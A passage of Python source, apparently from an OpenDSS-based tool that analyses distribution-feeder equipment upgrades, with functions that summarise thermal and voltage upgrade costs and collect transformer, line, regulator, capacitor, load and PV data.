pd.DataFrame(columns=voltage_cost_df.columns)\r\n temp_upgrade_df = temp_upgrade_df.rename(columns={\"name\": \"equipment_name\"}) \r\n temp_cost_df = temp_cost_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n if equipment_type == \"capacitor_control\":\r\n new_df, new, setting_changed = create_capacitor_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type)\r\n elif equipment_type == \"regulator_control\":\r\n new_df, new, setting_changed = create_regulator_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type)\r\n if new_df.empty: # if there are no equipment of this type\r\n continue \r\n new_df.set_index(\"equipment_name\", inplace=True)\r\n parameter_list = props_dict[equipment_type][\"parameter_list\"]\r\n if not original_equipment_df.empty:\r\n original_equipment_df.set_index(\"equipment_name\", inplace=True)\r\n for i in range(0, len(parameter_list)):\r\n new_df[f\"parameter{i+1}_name\"] = parameter_list[i].lower()\r\n new_df[f\"parameter{i+1}_original\"] = new_df[parameter_list[i]]\r\n new_df[f\"parameter{i+1}_upgraded\"] = new_df[parameter_list[i]]\r\n new_df.loc[new_df.index.isin(new), f\"parameter{i+1}_original\"] = None # new equipment original rating is None\r\n if not original_equipment_df.empty:\r\n new_df.loc[new_df.index.isin(setting_changed), f\"parameter{i+1}_original\"] = original_equipment_df.loc[original_equipment_df.index.isin(setting_changed)][parameter_list[i]]\r\n new_df.reset_index(inplace=True)\r\n new_df = new_df[output_cols]\r\n new_voltage_df = pd.concat([new_voltage_df, new_df])\r\n return new_voltage_df\r\n\r\n\r\ndef create_overall_output_file(feeder_stats, upgrades_dict, costs_dict, **kwargs):\r\n \"\"\"This function creates the overall output summary file\r\n Status can have values: unchanged, replaced, new, setting_changed\r\n \"\"\"\r\n output_cols = UpgradesCostResultSummaryModel.schema(True).get(\"properties\").keys()\r\n thermal_equipment_type_list = kwargs.get(\"thermal_equipment_type_list\", [\"transformer\", \"line\"])\r\n voltage_equipment_type_list = kwargs.get(\"voltage_equipment_type_list\", [\"capacitor_control\", \"regulator_control\"])\r\n props_dict = {\"transformer\": {\"identifier\": \"name\", \"parameter_list\": [\"kVA\"], },\r\n \"line\": {\"identifier\": \"name\", \"parameter_list\": [\"normamps\"], },\r\n \"capacitor_control\": {\"identifier\": \"capacitor_name\", \"parameter_list\": [\"ONsetting\", \"OFFsetting\", \"Delay\"], \"upgrades_file_string\": \"capacitor\", \r\n \"model\": CapacitorControllerResultType},\r\n \"regulator_control\": {\"identifier\": \"name\", \"parameter_list\": [\"vreg\", \"band\", \"delay\"], \"upgrades_file_string\": \"regcontrol\", \r\n \"model\": VoltageRegulatorResultType}, \r\n }\r\n thermal_cost_df = costs_dict[\"thermal\"]\r\n thermal_cost_df = pd.concat([thermal_cost_df.drop(['equipment_parameters'], axis=1), thermal_cost_df['equipment_parameters'].apply(pd.Series)], axis=1)\r\n voltage_cost_df = costs_dict[\"voltage\"]\r\n \r\n output_file = []\r\n for stage_item in feeder_stats[\"stage_results\"]:\r\n if (stage_item[\"stage\"].lower() == \"initial\") and (stage_item[\"upgrade_type\"].lower() == \"thermal\"):\r\n all_original_equipment = stage_item\r\n if (stage_item[\"stage\"].lower() == \"final\") and (stage_item[\"upgrade_type\"].lower() == \"voltage\"):\r\n all_latest_equipment = stage_item\r\n \r\n thermal_summary_df = create_thermal_output_summary(all_original_equipment, all_latest_equipment, thermal_equipment_type_list,\r\n props_dict, thermal_cost_df, upgrades_dict, output_cols)\r\n \r\n voltage_summary_df = create_voltage_output_summary(all_original_equipment, all_latest_equipment, voltage_equipment_type_list,\r\n props_dict, voltage_cost_df, upgrades_dict, output_cols)\r\n combined_df = pd.concat([thermal_summary_df, voltage_summary_df])\r\n combined_df[\"name\"] = kwargs.get(\"job_name\", None)\r\n return combined_df\r\n\r\n\r\ndef create_opendss_definition(config_definition_dict, action_type=\"New\", property_list=None):\r\n \"\"\"This function creates an opendss element definition for any generic equipment\r\n\r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n command_string = f\"{action_type} {config_definition_dict['equipment_type']}.{config_definition_dict['name']}\"\r\n logger.debug(f\"New {config_definition_dict['equipment_type']}.{config_definition_dict['name']} being defined\")\r\n # these properties contain data (refer OpenDSS manual for more information on these parameters)\r\n if property_list is None:\r\n property_list = list(set(config_definition_dict.keys()) - {\"name\", \"equipment_type\"})\r\n empty_field_values = [\"----\", \"nan\", \"NaN\", \"None\", None, np.nan]\r\n for property_name in property_list:\r\n if isinstance(config_definition_dict[property_name], float):\r\n if np.isnan(config_definition_dict[property_name]):\r\n continue\r\n if config_definition_dict[property_name] in empty_field_values:\r\n continue\r\n # if the value is not empty and is not nan, only then add it into the command string\r\n temp_s = f\" {property_name}={config_definition_dict[property_name]}\"\r\n command_string = command_string + temp_s\r\n return command_string\r\n\r\n\r\ndef ensure_line_config_exists(chosen_option, new_config_type, external_upgrades_technical_catalog): \r\n \"\"\"This function check if a line config exists in the network. \r\n If it doesn't exist, it checks the external catalog (if available) and returns a new dss definition string.\r\n \r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n existing_config_dict = {\"linecode\": get_line_code(), \"geometry\": get_line_geometry()}\r\n new_config_name = chosen_option[new_config_type].lower()\r\n # if there are no existing config definitions\r\n if existing_config_dict[new_config_type].empty:\r\n command_string = add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog)\r\n else:\r\n # if linecode or linegeometry is not present in existing network definitions\r\n if not existing_config_dict[new_config_type][\"name\"].str.lower().isin([new_config_name]).any(): \r\n command_string = add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog)\r\n else:\r\n command_string = None \r\n return command_string\r\n\r\n\r\ndef add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog):\r\n # add definition for linecode or linegeometry\r\n if external_upgrades_technical_catalog is None:\r\n raise UpgradesExternalCatalogRequired(f\"External upgrades technical catalog not available to determine line config type\")\r\n if (new_config_type not in external_upgrades_technical_catalog):\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definitions not found in external catalog.\"\r\n f\" Please check catalog, and add {new_config_type} definitions in it.\")\r\n external_config_df = pd.DataFrame(external_upgrades_technical_catalog[new_config_type])\r\n if external_config_df.empty: \r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definitions not found in external catalog.\" \r\n f\" Please check catalog, and add {new_config_type} definitions in it.\")\r\n new_config_name = chosen_option[new_config_type]\r\n if external_config_df[\"name\"].str.lower().isin([new_config_name.lower()]).any():\r\n config_definition_df = external_config_df.loc[external_config_df[\"name\"].str.lower() == new_config_name.lower()].copy()\r\n if len(config_definition_df) == 1: # if there is only one definition of that config name\r\n config_definition_dict = dict(config_definition_df.iloc[0]) \r\n elif len(config_definition_df) > 1: # if there is more than one definition of that config name\r\n config_definition_df[\"temp_deviation\"] = abs(config_definition_df[\"normamps\"] - chosen_option[\"normamps\"])\r\n config_definition_dict = dict(config_definition_df.loc[config_definition_df[\"temp_deviation\"].idxmin()])\r\n config_definition_dict.pop(\"temp_deviation\")\r\n else: # if definition not found\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_name} definition of {new_config_type} type {new_config_type} not found in external catalog.\")\r\n if config_definition_dict[\"normamps\"] != chosen_option[\"normamps\"]:\r\n logger.warning(f\"Mismatch between noramps for linecode {new_config_name} ({config_definition_dict['normamps']}A) \"\r\n f\"and chosen upgrade option normamps ({chosen_option['normamps']}A): {chosen_option['name']}\")\r\n config_definition_dict[\"name\"] = new_config_name # to keep same case of config name (for consistency)\r\n # check format of certain fields, and prepare data to write opendss definition\r\n matrix_fields = [s for s in config_definition_dict.keys() if 'matrix' in s]\r\n for field in matrix_fields:\r\n config_definition_dict[field] = str(config_definition_dict[field]).replace(\"'\",\"\")\r\n config_definition_dict[field] = config_definition_dict[field].replace(\"[\",\"(\")\r\n config_definition_dict[field] = config_definition_dict[field].replace(\"]\",\")\")\r\n config_definition_dict[\"equipment_type\"] = new_config_type\r\n command_string = create_opendss_definition(config_definition_dict=config_definition_dict)\r\n else:\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definition for {new_config_name} not found in external catalog.\"\r\n )\r\n return command_string\r\n\r\n\r\ndef get_present_loading_condition():\r\n \"\"\" Get present loading condition for all loads\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n load_dict = {}\r\n dss.Circuit.SetActiveClass(\"Load\")\r\n flag = dss.ActiveClass.First()\r\n\r\n while flag > 0:\r\n # Get the name of the load\r\n load_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kW': float(dss.Properties.Value(\"kW\")),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n }\r\n # Move on to the next Load...\r\n flag = dss.ActiveClass.Next()\r\n load_df = pd.DataFrame.from_dict(load_dict, \"index\")\r\n return load_df\r\n\r\n\r\ndef get_present_storage_condition():\r\n \"\"\" Get present operating condition for all storage\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n storage_dict = {}\r\n dss.Circuit.SetActiveClass('Storage')\r\n flag = dss.ActiveClass.First()\r\n while flag > 0:\r\n # Get the name of the load\r\n storage_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kW': float(dss.Properties.Value(\"kW\")),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n }\r\n # Move on to the next ...\r\n flag = dss.ActiveClass.Next()\r\n storage_df = pd.DataFrame.from_dict(storage_dict, \"index\")\r\n return storage_df\r\n\r\n\r\ndef get_present_pvgeneration():\r\n \"\"\" Get present generation for all pv systems\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n pv_dict = {}\r\n dss.Circuit.SetActiveClass(\"PVSystem\")\r\n flag = dss.ActiveClass.First()\r\n while flag:\r\n pv_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kvar': float(dss.Properties.Value(\"kvar\")),\r\n 'Irradiance': float(dss.Properties.Value(\"Irradiance\")),\r\n 'connection': dss.Properties.Value(\"conn\"),\r\n 'Pmpp': float(dss.Properties.Value(\"Pmpp\")),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Voltages': dss.CktElement.Voltages(),\r\n 'VoltagesMagAng': dss.CktElement.VoltagesMagAng(),\r\n 'VoltagesMag': float(dss.CktElement.VoltagesMagAng()[0]),\r\n }\r\n flag = dss.ActiveClass.Next() > 0\r\n pv_df = pd.DataFrame.from_dict(pv_dict, \"index\")\r\n return pv_df\r\n \r\n\r\ndef check_enabled_property(all_df, element_name):\r\n \"\"\"This function checks values for the \"enabled\" property of a dss object \r\n \"\"\"\r\n flag = any(ele.lower() in [\"yes\", \"no\"] for ele in all_df.enabled.unique())\r\n if not flag:\r\n raise OpenDssCompileError(f\"Unexpected values {all_df.enabled.unique()} received for 'enabled' {element_name} \"\r\n \"property. Check OpenDSS version\")\r\n return\r\n\r\n\r\ndef check_switch_property(all_df):\r\n \"\"\"This function checks values for the \"switch\" property of line object \r\n \"\"\"\r\n flag = any(ele.lower() in [\"yes\", \"no\"] for ele in all_df.Switch.unique())\r\n if not flag:\r\n raise OpenDssCompileError(f\"Unexpected values {all_df.Switch.unique()} received for 'Switch' line \"\r\n \"property. Check OpenDSS version\")\r\n return\r\n\r\n\r\ndef get_all_transformer_info_instance(upper_limit=None, compute_loading=True):\r\n \"\"\"This collects transformer information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"transformer\")\r\n check_enabled_property(all_df, element_name=\"transformer\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n # extract only enabled lines\r\n all_df = all_df.loc[all_df[\"enabled\"].str.lower() == \"yes\"]\r\n all_df[\"conn\"] = all_df[\"conn\"].str.strip() # remove trailing space from conn field\r\n # define empty new columns\r\n all_df['bus_names_only'] = None\r\n all_df[\"amp_limit_per_phase\"] = np.nan\r\n all_df[DSS_XFMR_INT_FIELDS] = all_df[DSS_XFMR_INT_FIELDS].astype(int)\r\n all_df[DSS_XFMR_FLOAT_FIELDS] = all_df[DSS_XFMR_FLOAT_FIELDS].astype(float)\r\n if compute_loading:\r\n all_df[\"max_amp_loading\"] = np.nan\r\n all_df[\"max_per_unit_loading\"] = np.nan\r\n all_df[\"status\"] = \"\"\r\n for index, row in all_df.iterrows():\r\n all_df.at[index, \"kVs\"] = [float(a) for a in row[\"kVs\"]]\r\n all_df.at[index, \"kVAs\"] = [float(a) for a in row[\"kVAs\"]]\r\n try:\r\n all_df.at[index, \"Xscarray\"] = [float(a) for a in row[\"Xscarray\"]] # before opendssdirect version 0.7.0\r\n except ValueError:\r\n all_df.at[index, \"Xscarray\"] = [float(a) for a in row[\"Xscarray\"][0].split(\" \")] # in opendssdirect version 0.7.0\r\n all_df.at[index, \"%Rs\"] = [float(a) for a in row[\"%Rs\"]]\r\n all_df.at[index, \"taps\"] = [float(a) for a in row[\"taps\"]]\r\n all_df.at[index, \"bus_names_only\"] = [a.split(\".\")[0].lower() for a in row[\"buses\"]]\r\n # first winding is considered primary winding\r\n primary_kv = float(row[\"kVs\"][0])\r\n primary_kva = float(row[\"kVAs\"][0])\r\n if row[\"phases\"] > 1:\r\n amp_limit_per_phase = primary_kva / (primary_kv * math.sqrt(3))\r\n elif row[\"phases\"] == 1:\r\n amp_limit_per_phase = primary_kva / primary_kv\r\n else:\r\n raise InvalidOpenDssElementError(f\"Incorrect number of phases for transformer {row['name']}\")\r\n all_df.at[index, \"amp_limit_per_phase\"] = amp_limit_per_phase\r\n if compute_loading:\r\n if upper_limit is None:\r\n raise Exception(\"Transformer upper limit is to be passed to function to compute transformer loading\")\r\n dss.Circuit.SetActiveElement(\"Transformer.{}\".format(row[\"name\"]))\r\n extract_magang = dss.CktElement.CurrentsMagAng()[: 2 * row[\"phases\"]] # extract elements based on num of ph\r\n xfmr_current_magnitude = extract_magang[::2]\r\n max_amp_loading = max(xfmr_current_magnitude)\r\n max_per_unit_loading = round(max_amp_loading / amp_limit_per_phase, 4)\r\n all_df.at[index, \"max_amp_loading\"] = max_amp_loading\r\n all_df.at[index, \"max_per_unit_loading\"] = max_per_unit_loading\r\n if max_per_unit_loading > upper_limit:\r\n all_df.at[index, \"status\"] = \"overloaded\"\r\n elif max_per_unit_loading == 0:\r\n all_df.at[index, \"status\"] = \"unloaded\"\r\n else:\r\n all_df.at[index, \"status\"] = \"normal\"\r\n all_df = all_df.reset_index(drop=True).set_index('name')\r\n return all_df.reset_index()\r\n\r\n\r\ndef add_info_line_definition_type(all_df):\r\n all_df[\"line_definition_type\"] = \"line_definition\"\r\n all_df.loc[all_df[\"linecode\"] != \"\", \"line_definition_type\"] = \"linecode\"\r\n all_df.loc[all_df[\"geometry\"] != \"\", \"line_definition_type\"] = \"geometry\"\r\n return all_df\r\n\r\n\r\ndef determine_line_placement(line_series):\r\n \"\"\" Distinguish between overhead and underground cables.\r\n Latest opendss version has property \"LineType\"\r\n line_placement is determined via:\r\n 1. \"LineType\" property\r\n 2. height property if defined as line geometry\r\n # line_placement determined via height takes precedence over linetype property\r\n # this is because if linetype property is not defined in opendss definition, then default: oh is assigned\r\n \r\n If line_placement is still not available, it is determined using presence of string \"oh\" or \"ug\" in name\r\n\r\n Parameters\r\n ----------\r\n line_series\r\n\r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n info_dict = {}\r\n info_dict[\"line_placement\"] = None\r\n line_placement = None\r\n # use linetype property to determine line_placement\r\n if (\"LineType\" in line_series) and (line_series[\"LineType\"] in [\"oh\", \"ug\"]):\r\n if line_series[\"LineType\"] == \"oh\":\r\n linetype_placement = \"overhead\"\r\n else:\r\n linetype_placement = \"underground\"\r\n line_placement = linetype_placement\r\n if line_series[\"line_definition_type\"] == \"geometry\":\r\n # use height property to determine line_placement\r\n dss.Circuit.SetActiveClass(\"linegeometry\")\r\n dss.ActiveClass.Name(line_series[\"geometry\"])\r\n h = float(dss.Properties.Value(\"h\"))\r\n info_dict[\"h\"] = 0\r\n if h >= 0:\r\n geom_placement = \"overhead\"\r\n else:\r\n geom_placement = \"underground\"\r\n # line_placement determined via height takes precedence over linetype property\r\n # this is because if linetype property is not defined in opendss definition, then default: oh is assigned\r\n if linetype_placement != geom_placement:\r\n line_placement = geom_placement \r\n # if line_placement is still None, then use line name to determine line placement\r\n if line_placement is None:\r\n if (\"oh\" in line_series[\"geometry\"].lower()) or (\"oh\" in line_series[\"linecode\"].lower()) :\r\n line_placement = \"overhead\"\r\n elif (\"ug\" in line_series[\"geometry\"].lower()) or (\"ug\" in line_series[\"linecode\"].lower()):\r\n line_placement = \"underground\"\r\n else:\r\n line_placement = \"overhead\" # default is taken as overhead\r\n info_dict[\"line_placement\"] = line_placement\r\n return info_dict\r\n\r\n\r\ndef get_all_line_info_instance(upper_limit=None, compute_loading=True, ignore_switch=True):\r\n \"\"\"This collects line information.\r\n \r\n dss.Lines.Units() gives an integer. It can be mapped as below:\r\n units_config = [\"none\", \"mi\", \"kft\", \"km\", \"m\", \"Ft\", \"in\", \"cm\"] # Units key for lines taken from OpenDSS\r\n units_config[dss.Lines.Units() - 1]\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"line\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"line\")\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n # extract only enabled lines\r\n all_df = all_df.loc[all_df[\"enabled\"].str.lower() == \"yes\"]\r\n all_df = add_info_line_definition_type(all_df)\r\n # define empty new columns\r\n all_df[\"kV\"] = np.nan\r\n all_df[\"h\"] = np.nan\r\n all_df[\"line_placement\"] = \"\"\r\n all_df[DSS_LINE_INT_FIELDS] = all_df[DSS_LINE_INT_FIELDS].astype(int)\r\n all_df[DSS_LINE_FLOAT_FIELDS] = all_df[DSS_LINE_FLOAT_FIELDS].astype(float)\r\n if compute_loading:\r\n all_df[\"max_amp_loading\"] = np.nan\r\n all_df[\"max_per_unit_loading\"] = np.nan\r\n all_df[\"status\"] = \"\"\r\n for index, row in all_df.iterrows():\r\n dss.Circuit.SetActiveBus(row[\"bus1\"])\r\n kv_b1 = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveBus(row[\"bus2\"])\r\n kv_b2 = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveElement(\"Line.{}\".format(row[\"name\"]))\r\n if round(kv_b1) != round(kv_b2):\r\n raise InvalidOpenDssElementError(\"To and from bus voltages ({} {}) do not match for line {}\".format(\r\n kv_b2, kv_b1, row['name']))\r\n all_df.at[index, \"kV\"] = kv_b1\r\n # Distinguish between overhead and underground cables\r\n # currently there is no way to distinguish directy using opendssdirect/pydss etc.\r\n # It is done here using property 'height' parameter and if string present in name\r\n placement_dict = determine_line_placement(row)\r\n for key in placement_dict.keys():\r\n all_df.at[index, key] = placement_dict[key] \r\n if row[\"units\"] == \"none\":\r\n # possible unit values: {none | mi|kft|km|m|Ft|in|cm } Default is None - assumes length units match impedance units.\r\n # if units match, then it returns none: in this case, assign value from other lines present in dataframe\r\n if dss.Lines.Units() != 0:\r\n all_df.at[index, \"units\"] = DSS_UNIT_CONFIG[dss.Lines.Units()]\r\n else:\r\n def_unit = all_df.units.unique()[0]\r\n if def_unit != \"none\":\r\n all_df.at[index, \"units\"] = def_unit\r\n else:\r\n all_df.at[index, \"units\"] = \"m\" # if a unit was not found, assign default of m\r\n # if line loading is to be computed\r\n if compute_loading:\r\n if upper_limit is None:\r\n raise Exception(\"Line upper limit is to be passed to function to compute line loading\")\r\n dss.Circuit.SetActiveElement(\"Line.{}\".format(row[\"name\"]))\r\n extract_magang = dss.CktElement.CurrentsMagAng()[: 2 * row[\"phases\"]]\r\n line_current = extract_magang[::2]\r\n max_amp_loading = max(line_current)\r\n max_per_unit_loading = round(max_amp_loading / row[\"normamps\"], 4)\r\n all_df.at[index, \"max_amp_loading\"] = max_amp_loading\r\n all_df.at[index, \"max_per_unit_loading\"] = max_per_unit_loading\r\n if max_per_unit_loading > upper_limit:\r\n all_df.at[index, \"status\"] = \"overloaded\"\r\n elif max_per_unit_loading == 0:\r\n all_df.at[index, \"status\"] = \"unloaded\"\r\n else:\r\n all_df.at[index, \"status\"] = \"normal\"\r\n all_df = all_df.reset_index(drop=True).set_index('name')\r\n all_df[\"kV\"] = all_df[\"kV\"].round(5)\r\n # add units to switch length (needed to plot graph). By default, length of switch is taken as max\r\n check_switch_property(all_df)\r\n all_df.loc[(all_df.units == 'none') & (all_df.Switch.str.lower() == \"yes\"), 'units'] = 'm'\r\n # if switch is to be ignored\r\n if ignore_switch:\r\n all_df = all_df.loc[all_df['Switch'].str.lower() == \"no\"]\r\n return all_df.reset_index()\r\n\r\n\r\ndef compare_multiple_dataframes(comparison_dict, deciding_column_name, comparison_type=\"max\"):\r\n \"\"\"This function compares all dataframes in a given dictionary based on a deciding column name\r\n\r\n Returns\r\n -------\r\n Dataframe\r\n \"\"\"\r\n summary_df = pd.DataFrame()\r\n for df_name in comparison_dict.keys():\r\n summary_df[df_name] = comparison_dict[df_name][deciding_column_name]\r\n if comparison_type == \"max\":\r\n label_df = summary_df.idxmax(axis=1) # find dataframe name that has max \r\n elif comparison_type == \"min\":\r\n label_df = summary_df.idxmax(axis=1) # find dataframe name that has min \r\n else:\r\n raise Exception(f\"Unknown comparison type {comparison_type} passed.\")\r\n final_list = []\r\n for index, label in label_df.items(): # index is element name\r\n temp_dict = dict(comparison_dict[label].loc[index])\r\n temp_dict.update({\"name\": index})\r\n final_list.append(temp_dict)\r\n final_df = pd.DataFrame(final_list)\r\n return final_df\r\n \r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_thermal_equipment_info(compute_loading, equipment_type, upper_limit=None, ignore_switch=False, **kwargs):\r\n \"\"\"This function determines the thermal equipment loading (line, transformer), based on timepoint multiplier\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n timepoint_multipliers = kwargs.get(\"timepoint_multipliers\", None)\r\n multiplier_type = kwargs.get(\"multiplier_type\", LoadMultiplierType.ORIGINAL)\r\n # if there are no multipliers, run on rated load i.e. multiplier=1. 0\r\n # if compute_loading is false, then just run once (no need to check multipliers)\r\n if (timepoint_multipliers is None) or (not compute_loading) or (multiplier_type == LoadMultiplierType.ORIGINAL): \r\n if compute_loading and multiplier_type != LoadMultiplierType.ORIGINAL:\r\n apply_uniform_timepoint_multipliers(multiplier_name=1, field=\"with_pv\", **kwargs)\r\n if equipment_type == \"line\":\r\n loading_df = get_all_line_info_instance(compute_loading=compute_loading, upper_limit=upper_limit, ignore_switch=ignore_switch)\r\n elif equipment_type == \"transformer\":\r\n loading_df = get_all_transformer_info_instance(compute_loading=compute_loading, upper_limit=upper_limit)\r\n return loading_df\r\n if multiplier_type == LoadMultiplierType.UNIFORM:\r\n comparison_dict = {}\r\n for pv_field in timepoint_multipliers[\"load_multipliers\"].keys():\r\n logger.debug(pv_field)\r\n for multiplier_name in timepoint_multipliers[\"load_multipliers\"][pv_field]:\r\n logger.debug(\"Multipler name: %s\", multiplier_name)\r\n # this changes the dss network load and pv\r\n apply_uniform_timepoint_multipliers(multiplier_name=multiplier_name, field=pv_field, **kwargs)\r\n if equipment_type.lower() == \"line\":\r\n deciding_column_name = \"max_per_unit_loading\"\r\n loading_df = get_all_line_info_instance(compute_loading=compute_loading, upper_limit=upper_limit, ignore_switch=ignore_switch)\r\n elif equipment_type.lower() == \"transformer\":\r\n deciding_column_name = \"max_per_unit_loading\"\r\n loading_df = get_all_transformer_info_instance(compute_loading=compute_loading, upper_limit=upper_limit)\r\n loading_df.set_index(\"name\", inplace=True)\r\n comparison_dict[pv_field+\"_\"+str(multiplier_name)] = loading_df\r\n # compare all dataframe, and create one that contains all worst loading conditions (across all multiplier conditions)\r\n loading_df = compare_multiple_dataframes(comparison_dict, deciding_column_name, comparison_type=\"max\")\r\n else:\r\n raise Exception(f\"Undefined multiplier_type {multiplier_type} passed.\") \r\n return loading_df\r\n \r\n\r\ndef get_regcontrol_info(correct_PT_ratio=False, nominal_voltage=None):\r\n \"\"\"This collects enabled regulator control information.\r\n If correcting PT ratio, the following information is followed (based on OpenDSS documentation)\r\n PT ratio: # If the winding is Wye, the line-to-neutral voltage is used. Else, the line-to-line voltage is used.\r\n # Here, bus kV is taken from Bus.kVBase\r\n \r\n Bus base kV: Returns L-L voltages for 2- and 3-phase. Else for 1-ph, return L-N voltage\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"regcontrol\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"regcontrol\") \r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n float_columns = ['winding', 'vreg', 'band', 'ptratio', 'delay']\r\n all_df[float_columns] = all_df[float_columns].astype(float)\r\n all_df['at_substation_xfmr_flag'] = False # by default, reg control is considered to be not at substation xfmr\r\n ckt_info_dict = get_circuit_info()\r\n sub_xfmr_present = False\r\n sub_xfmr_name = None\r\n if ckt_info_dict['substation_xfmr'] is not None:\r\n sub_xfmr_present = True\r\n sub_xfmr_name = ckt_info_dict['substation_xfmr']['name']\r\n if correct_PT_ratio:\r\n if nominal_voltage is None:\r\n raise Exception(\"Nominal voltage not provided to correct regcontrol PT ratio.\")\r\n all_df['old_ptratio'] = all_df['ptratio']\r\n \r\n for index, row in all_df.iterrows():\r\n dss.Circuit.SetActiveElement(\"Regcontrol.{}\".format(row[\"name\"]))\r\n reg_bus = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n all_df.at[index, \"reg_bus\"] = reg_bus\r\n dss.Circuit.SetActiveBus(reg_bus)\r\n all_df.at[index, \"bus_num_phases\"] = dss.CktElement.NumPhases()\r\n all_df.at[index, \"bus_kv\"] = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveElement(\"Transformer.{}\".format(row[\"transformer\"]))\r\n all_df.at[index, \"transformer_kva\"] = float(dss.Properties.Value(\"kva\"))\r\n dss.Transformers.Wdg(1) # setting winding to 1, to get kV for winding 1\r\n all_df.at[index, \"transformer_kv\"] = dss.Transformers.kV()\r\n all_df.at[index, \"transformer_conn\"] = dss.Properties.Value(\"conn\").strip() # opendss returns conn with a space \r\n all_df.at[index, \"transformer_bus1\"] = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n all_df.at[index, \"transformer_bus2\"] = dss.CktElement.BusNames()[1].split(\".\")[0]\r\n if correct_PT_ratio:\r\n if (all_df.loc[index][\"bus_num_phases\"] > 1) and (all_df.loc[index][\"transformer_conn\"].lower() == \"wye\"):\r\n kV_to_be_used = all_df.loc[index][\"transformer_kv\"] * 1000 / math.sqrt(3)\r\n else:\r\n kV_to_be_used = all_df.loc[index][\"transformer_kv\"] * 1000\r\n # kV_to_be_used = dss.Bus.kVBase() * 1000\r\n all_df.at[index, \"ptratio\"] = kV_to_be_used / nominal_voltage\r\n if sub_xfmr_present and (row[\"transformer\"] == sub_xfmr_name): # if reg control is at substation xfmr\r\n all_df.at[index, 'at_substation_xfmr_flag'] = True\r\n all_df = all_df.reset_index(drop=True).set_index('name') \r\n all_df = all_df.loc[all_df['enabled'].str.lower() == \"yes\"]\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_capacitor_info(nominal_voltage=None, correct_PT_ratio=False):\r\n \"\"\"\r\n This collects capacitor information.\r\n For correcting PT ratio, the following information and definitions are followed:\r\n # cap banks are 3 phase, 2 phase or 1 phase. 1 phase caps will have LN voltage\r\n # PT ratio: Ratio of the PT that converts the monitored voltage to the control voltage. \r\n # If the capacitor is Wye, the 1st phase line-to-neutral voltage is monitored.\r\n # Else, the line-to-line voltage (1st - 2nd phase) is monitored.\r\n # Capacitor kv: Rated kV of the capacitor (not necessarily same as bus rating). \r\n # For Phases=2 or Phases=3, it is line-to-line (phase-to-phase) rated voltage. \r\n # For all other numbers of phases, it is actual rating. (For Delta connection this is always line-to-line rated voltage). \r\n This function doesnt currently check if object is \"enabled\".\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"capacitor\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"capacitor\") \r\n all_df[\"capacitor_name\"] = 